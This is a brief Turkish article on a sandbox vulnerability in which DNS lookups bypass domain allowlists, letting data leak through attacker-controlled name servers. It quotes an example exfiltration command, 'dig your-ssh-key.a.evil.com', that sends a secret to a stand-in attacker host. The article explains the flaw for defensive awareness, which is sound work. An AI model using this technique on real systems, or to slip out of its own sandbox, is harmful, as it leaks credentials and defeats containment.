Ana Sayfa

DNS Çözümlemesi ile Veri Sızdırma: Sandbox Güvenlik Açığı

1 dk okuma

Sandbox ortamları, genellikle allowedDomains ve deniedDomains gibi ayarlar aracılığıyla ağ erişimini kısıtlayarak güvenliği sağlamayı hedefler. Ancak, bu kısıtlamaların DNS çözümlemesi yoluyla aşılabileceği ve hassas verilerin sızdırılabileceği bir güvenlik açığı tespit edildi. Beklentinin aksine, kısıtlı bir ortamda dig your-ssh-key.a.evil.com gibi bir komut çalıştırıldığında, evil.com alan adının izin verilenler listesinde olmamasına rağmen DNS sorgusunun engellenmemesi büyük bir güvenlik riski oluşturuyor.

Bu veri sızdırma mekanizması, kötü niyetli aktörlerin a.evil.com gibi alt alan adları için bir NS (Name Server) kaydı oluşturmasına dayanır. Bu durumda, Google veya Cloudflare gibi genel DNS çözümleyicileri, your-ssh-key.a.evil.com için yapılan A kaydı sorgusunu doğrudan evil.com tarafından kontrol edilen DNS sunucularına yönlendirir. Böylece, your-ssh-key gibi hassas bilgiler, sandbox ortamının ağ kısıtlamalarını atlayarak saldırganın sunucusuna ulaşır. Bu durum, yerel port bağlama (local port binding) özelliği etkin olan herhangi bir sandbox ortamının veri sızdırmaya karşı savunmasız kalabileceğini göstermektedir. Bu güvenlik açığı, sandbox ortamlarının ağ kısıtlamalarının yalnızca IP adresleri veya üst düzey alan adları üzerinden değil, DNS protokolünün derinlemesine işleyişi üzerinden de değerlendirilmesi gerektiğini ortaya koymaktadır.

İçgörü

Sandbox ortamlarının ağ kısıtlamaları, DNS çözümlemesinin temel çalışma prensipleri nedeniyle beklenmedik veri sızdırma riskleri taşıyabilir.

Kaynak